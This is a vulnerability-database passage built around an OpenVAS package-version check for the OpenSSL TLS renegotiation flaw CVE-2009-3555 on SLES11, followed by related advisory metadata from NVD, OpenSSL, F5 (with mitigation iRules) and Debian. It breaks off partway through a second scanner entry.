ID OPENVAS:66285 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2017-07-11T00:00:00
Description
The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
libopenssl0_9_8
openssl
openssl-doc
More details may also be found by searching for the SuSE
Enterprise Server 11 patch database located at
http://download.novell.com/patch/finder/
#
#VID d0129289ed5f99e99f64649fe9227069
# OpenVAS Vulnerability Test
# $
# Description: Security update for libopenssl
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
libopenssl0_9_8
openssl
openssl-doc
More details may also be found by searching for the SuSE
Enterprise Server 11 patch database located at
http://download.novell.com/patch/finder/";
tag_solution = "Please install the updates provided by SuSE.";
if(description)
{
script_xref(name : "URL" , value : "https://bugzilla.novell.com/show_bug.cgi?id=553641");
script_id(66285);
script_version("$Revision: 6666 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $");
script_tag(name:"creation_date", value:"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)");
script_cve_id("CVE-2009-3555");
script_tag(name:"cvss_base", value:"5.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:P");
script_name("SLES11: Security update for libopenssl");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"libopenssl0_9_8", rpm:"libopenssl0_9_8~0.9.8h~30.15.1", rls:"SLES11.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"openssl", rpm:"openssl~0.9.8h~30.15.1", rls:"SLES11.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"openssl-doc", rpm:"openssl-doc~0.9.8h~30.15.1", rls:"SLES11.0")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:66285", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES11: Security update for libopenssl", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-11-17T00:00:00", "modified": "2017-07-11T00:00:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=66285", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=553641"], "cvelist": ["CVE-2009-3555"], "lastseen": "2017-07-26T08:55:41", "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2017-07-26T08:55:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3555"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2009-3555"]}, {"type": "f5", "idList": ["F5:K10737", "SOL10737"]}, {"type": "openvas", "idList": ["OPENVAS:880612", "OPENVAS:136141256231066497", "OPENVAS:136141256231066279", "OPENVAS:840453", "OPENVAS:136141256231066583", "OPENVAS:800466", "OPENVAS:66278", "OPENVAS:1361412562310840468", "OPENVAS:136141256231066563", "OPENVAS:840504"]}, {"type": "seebug", "idList": ["SSV:12600", "SSV:18637", "SSV:15088"]}, {"type": "nessus", "idList": ["SUSE_11_0_LIBOPENSSL-DEVEL-091112.NASL", "SL_20100325_NSS_ON_SL4_X.NASL", "SUSE_11_GNUTLS-101206.NASL", "SUSE_OPENSSL-6655.NASL", "SLACKWARE_SSA_2009-320-01.NASL", "SUSE_11_3_GNUTLS-101025.NASL", "SUSE_11_0_COMPAT-OPENSSL097G-091113.NASL", "SUSE_11_1_LIBOPENSSL-DEVEL-091112.NASL", "UBUNTU_USN-927-6.NASL", "FEDORA_2010-3905.NASL"]}, {"type": "redhat", "idList": ["RHSA-2010:0165"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23561", "SECURITYVULNS:DOC:22982", "SECURITYVULNS:VULN:10388", "SECURITYVULNS:DOC:23890", "SECURITYVULNS:DOC:22763", "SECURITYVULNS:DOC:22777"]}, {"type": "slackware", "idList": ["SSA-2009-320-01"]}, {"type": "ubuntu", "idList": ["USN-927-5", "USN-927-6", "USN-927-1"]}, {"type": "cisco", "idList": ["CISCO-SA-20091109-TLS"]}, {"type": "fedora", "idList": ["FEDORA:611D110F917", "FEDORA:4C4E710F878"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0165"]}, {"type": "exploitdb", "idList": ["EDB-ID:10071"]}, {"type": "hackerone", "idList": ["H1:5617"]}, {"type": "centos", "idList": ["CESA-2010:0165"]}], "modified": "2017-07-26T08:55:41", "rev": 2}, "vulnersScore": 5.4}, "pluginID": "66285", "sourceData": "#\n#VID d0129289ed5f99e99f64649fe9227069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for libopenssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=553641\");\n script_id(66285);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES11: Security update for libopenssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks"}
{"cve": [{"lastseen": "2021-02-06T13:30:38", "description": "The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a \"plaintext injection\" attack, aka the \"Project Mogul\" issue.", "edition": 10, "cvss3": {}, "published": "2009-11-09T17:30:00", "title": "CVE-2009-3555", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3555"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:openssl:openssl:1.0", "cpe:/o:debian:debian_linux:4.0", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:gnu:gnutls:2.8.5", "cpe:/o:canonical:ubuntu_linux:8.04", "cpe:/o:fedoraproject:fedora:13", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:fedoraproject:fedora:14", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/a:mozilla:nss:3.12.4", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:fedoraproject:fedora:12", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:apache:http_server:2.2.14", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:fedoraproject:fedora:11"], "id": "CVE-2009-3555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.04:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:nss:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:11:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:13:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0:*:openvms:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "openssl": [{"lastseen": "2020-09-14T11:36:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": " Implement RFC5746 to address vulnerabilities in SSL/TLS renegotiation.\n\n * Fixed in OpenSSL 0.9.8m (Affected 0.9.8-0.9.8l)\n", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENSSL:CVE-2009-3555", "href": "https://www.openssl.org/news/secadv/20091111.txt", "title": "Vulnerability in OpenSSL CVE-2009-3555", "type": "openssl", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "", "edition": 1, "modified": "2019-06-13T19:54:00", "published": "2013-07-06T01:56:00", "id": "F5:K10737", "href": "https://support.f5.com/csp/article/K10737", "title": "SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2016-05-30T21:02:08", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 1, "description": "A Man in the Middle attack allows an attacker to inject an arbitrary amount of chosen plain text into the application protocol stream data during a secure session renegotiation that uses SSL version 3.x or TLS version 1.x. This may provide an attacker the ability to perform arbitrary actions on affected websites with user's credentials. This vulnerability does not allow one to decrypt the intercepted network communication.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555>\n\n**Note**: F5 thanks Marsh Ray, who originally identified and reported this vulnerability.\n\nThe IETF has adopted as [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>) a new extension to the TLS standard that addresses this issue. F5 Product Development has implemented this new extension beginning in BIG-IP versions 10.2.3 and 11.0.0.\n\n**Important**: When session renegotiation is disabled, some browsers may log an informational message that appears similar to the following example to the console, when connecting to F5 products:\n\nServer does not support RFC 5746, see CVE-2009-3555\n\nAlthough the message implies that the F5 product to which the browser is connecting is vulnerable to this attack, all vulnerable F5 Products have been patched to disable SSL/TLS renegotiation, and some have been further enhanced to allow explicit control over renegotiation, thus mitigating this attack. For more information regarding completed and planned updates related to this vulnerability, refer to the following table. Note that ID 223836 specifically addresses this error message.\n\nF5 Product Development is tracking this issue as follows:\n\nCR / ID | Description | Affected products | Included in \n---|---|---|--- \nCR132165 / \n \nID 213305 | Introduce the **<disable|enable>** parameter to the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command to control on a per-connection basis how TMM should respond to SSL 3.0/TLS 1.0 renegotiation requests. \n\n\n**Important**: Client-side session renegotiation is still enabled, by default, in versions prior to 10.1.0. In these versions, you must apply an iRule using the **SSL::renegotiate disable **command to each virtual server configuration you wish to protect from this vulnerability. Refer to the mitigation section, following, for more information.\n\n**Note**: For more information, refer to the DevCentral wiki page for the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command.\n\n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEngineering Hotfix available for: \nEnterprise Manager 1.8 \nCR132166 / \n \nID 213306 | Patch OpenSSL to disable midstream session renegotiation. This patch protects the Configuration utility and iControl against this vulnerability. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132167 / \n \nID 213307 | Enable midstream session renegotiation for the **big3d **and **gtmd**. This CR is a companion to CR132166, re-enabling mid-stream session renegotiation for the **big3d **and **gtmd** processes, which maintain long-lived iQuery-over-SSL connections that are renegotiated daily. These connections are mutually authenticated using 2-way SSL authentication prior to exchanging application traffic and, thus, are not vulnerable to the man-in-the-middle attacks described in this Solution. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132170 / \n \nID 213308 | Introduce a Client SSL / ServerSSL profile option to control whether midstream session renegotiation is allowed. In versions 10.1.0 - 10.2.2, the default setting for the Client SSL profile is **disabled**, and the default setting for the Server SSL profile is **enabled**. **Note**: BIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM | BIG-IP 10.1.0 and later \n \nCR132172 / \n \nID 223836 | Implement [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>), an extension to the TLS standard for secure midstream session renegotiation. **Note**: For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 10.2.3 \nBIG-IP 11.0.0 and later \n \nCR132177 / \nID 295760\n\nand\n\nCR132177-1 / \nID 294172\n\n| Patch OpenSSL to disable midstream session renegotiation. | FirePass | \n\nFirePass 7.0.0 and later \nFirePass 6.1.0 HF1 * \nFirePass 6.0.3 hotfix-132177-1 \nFirePass 6.0.2 hotfix-132177-1 \nFirePass 5.5.2 hotfix-132177-1 \nFirePass 5.5.1 hotfix-132177-1 \nFirePass 5.5 hotfix-132177-1 \n \nImportant: For version 6.1.0, the \nfix for this ID was not included in \nHF3 or HF4. Install the latest \ncumulative hotfix. \n \nID 37053 | Patch or upgrade Apache Tomcat to disable session renegotiation. | ARX | ARX 6.2.0 \n \n \nIf a named hotfix has been issued for your software version, you may download the referenced hotfix or later versions of the hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nIf an engineering hotfix has been issued for your software version, you should contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), and reference this Solution number and the associated CR number to request the hotfix.\n\nFor a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nFor information about installing version 10.x hotfixes, refer to SOL10025: Managing BIG-IP product hotfixes (10.x).\n\n**Mitigation steps for BIG-IP LTM, ASM, PSM, Link Controller, WebAccelerator, or WOM SSL virtual servers**\n\nYou can use the Client SSL profile Renegotiation setting or an iRule to disable client-side session renegotiation for virtual servers. Refer to the following section that applies to your version:\n\n**Note**: Applications that require session renegotiation are inherently vulnerable to the attack. Only removal of the renegotiation requirement in the application itself will eliminate the vulnerability. If session renegotiation is disabled by any of the vulnerability mitigation steps described later, without modifying the application, client connections will be dropped. For example, IE 5.0 clients accessing applications which use SGC (Server Gated Cryptography) certificates are known to require renegotiation, and their connections would be disrupted by such a configuration.\n\n**Important**: Any mitigation action that re-enables session re-negotiation on patched vulnerable versions may re-expose your F5 system to this vulnerability. In some cases, iRule logic can be used to control this behavior. Refer to the following sections for details regarding your product and version.\n\n**BIG-IP versions 10.1.0 and later**\n\nBIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. SSL Renegotiation setting is **Enabled,** by default, in the SSL profiles, however, the system requires secure renegotiation of SSL connections. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension.\n\nIn BIG-IP version 10.1.0, the Renegotiation setting was added to the BIG-IP Client session and Server SSL profiles as a result of ID 213308 (formerly CR132180). In versions 10.1.0 - 10.2.2, the Renegotiation setting is **Disabled **by default in the Client SSL profile. Virtual servers using a Client SSL profile with the Renegotiation setting configured to **Disabled **are protected from this vulnerability.\n\nIf necessary, you can selectively enable renegotiation using the **SSL::renegotiate** iRules command on a virtual server that has renegotiation disabled in its Client SSL profile. For example, an iRule similar to the following enables renegotiation only for clients within a single Class C subnet:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nif { [IP::addr [IP::client_addr] equals 192.168.222.0/24] }{ \nSSL::renegotiate enable \n} \n}\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, and 10.1.0 through 10.2.x**\n\nTo mitigate the vulnerability, a BIG-IP system administrator may apply iRules similar to the following to each SSL virtual server. This sample iRule uses the **SSL::renegotiate** command to disable client-side session renegotiation, which prevents the BIG-IP system from processing a secondary session renegotiation request:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nSSL::renegotiate disable \n}\n\nThe **<enable|disable>**parameter was added to the **SSL::renegotiate** command in versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, 10.1.x, and 10.2.0 as a result of ID 213305 (formerly CR132165). In versions prior to 10.1.0, all virtual servers with a Client SSL profile applied will, by default, still accept session renegotiation.\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.4.x, 9.3.x prior to 9.3.1 HF8, and 10.0.x prior to 10.0.1 HF3**\n\nTo mitigate the vulnerability in versions that do not include the **SSL::renegotiate** command, apply an iRule similar to the following to each SSL virtual server. The iRule resets the connection if client-side SSL renegotiation is attempted.\n\nwhen CLIENT_ACCEPTED { \n# initialize TLS/SSL handshake count for this connection \nset sslhandshakecount 0 \n} \nwhen CLIENTSSL_HANDSHAKE priority 1 { \n# a handshake just occurred \nincr sslhandshakecount \n# is this the first handshake in this connection? \nif { $sslhandshakecount > 1 } { \n# log (rate limited) the event (to /var/log/ltm) \nlog \"\\\\[VS [IP::local_addr]:[TCP::local_port] client [IP::remote_addr]:[TCP::remote_port]\\\\]:TLS/SSL renegotiation\" \n# if not, close the clientside connection \nreject \n} \n} \n\n\n**Note**: This example was provided by F5 DevCentral poster Lupo. The original post is available at the following location:\n\n[mitigating the TLS client-initiated renegotiation MITM attack](<http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic>)\n\nA separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n", "modified": "2013-07-05T00:00:00", "published": "2009-11-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html", "id": "SOL10737", "title": "SOL10737 - SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:15:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-3 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : backward compatibility option for SSL/TLS insecure\n renegotiation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\nDebian Bug : 587037\n\nDSA-2141-1 changed the behaviour of the openssl libraries in a server\nenvironment to only allow SSL/TLS renegotiation for clients that\nsupport the RFC5746 renegotiation extension. This update to apache2\nadds the new SSLInsecureRenegotiation configuration option that allows\nto restore support for insecure clients. More information can be found\nin the file /usr/share/doc/apache2.2-common/NEWS.Debian.gz .\n\nFor the stable distribution (lenny), the compatibility option has been\nincluded in version 2.2.9-10+lenny9.\n\nIn addition, apache2-mpm-itk has been rebuilt to work with the updated\napache2 packages. The new version number is 2.2.6-02-1+lenny4.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), the compatibility option has been included since version\n2.2.15-1.\n\nWe recommend that you upgrade your apache2 and apache2-mpm-itk\npackages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2011-01-05T23:21:10", "published": "2011-01-05T23:21:10", "id": "DEBIAN:DSA-2141-1:7D2D7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00003.html", "title": "[SECURITY] [DSA-2141-1] New apache2 packages add backward compatibility option", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-11-11T13:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-2 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : nss\nVulnerability : SSL/TLS insecure renegotiation protocol design flaw\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\n\nCVE-2009-3555:\n\nMarsh Ray, Steve Dispensa, and Martin Rex discovered a flaw in the TLS\nand SSLv3 protocols. If an attacker could perform a man in the middle\nattack at the start of a TLS connection, the attacker could inject\narbitrary content at the beginning of the user's session. This update\nadds backported support for the new RFC5746 renegotiation extension\nwhich fixes this issue.\n\nThe updated libraries allow to use shell environment variables to\nconfigure if insecure renegotiation is still allowed. The syntax of\nthese environment variables is described in the release notes to\nversion 3.12.6 of nss:\n \nhttps://developer.mozilla.org/NSS_3.12.6_release_notes\n\nHowever, the default behaviour for nss in Debian 5.0 (Lenny) is \nNSS_SSL_ENABLE_RENEGOTIATION=3, which allows clients to continue to\nrenegotiate with vulnerable servers.\n\nFor the stable distribution (lenny), this problem has been fixed\nin version 3.12.3.1-0lenny3.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), this problem has been fixed in version 3.12.6-1.\n\nWe recommend that you upgrade your nss package.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2011-01-05T23:20:42", "published": "2011-01-05T23:20:42", "id": "DEBIAN:DSA-2141-2:2C2CF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00002.html", "title": "[SECURITY] [DSA-2141-2] New nss packages fix protocol design flaw", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-25T10:55:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nspr", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880611", "href": "http://plugins.openvas.org/nasl.php?oid=880611", "type": "openvas", "title": "CentOS Update for nspr CESA-2010:0165 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for nspr CESA-2010:0165 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 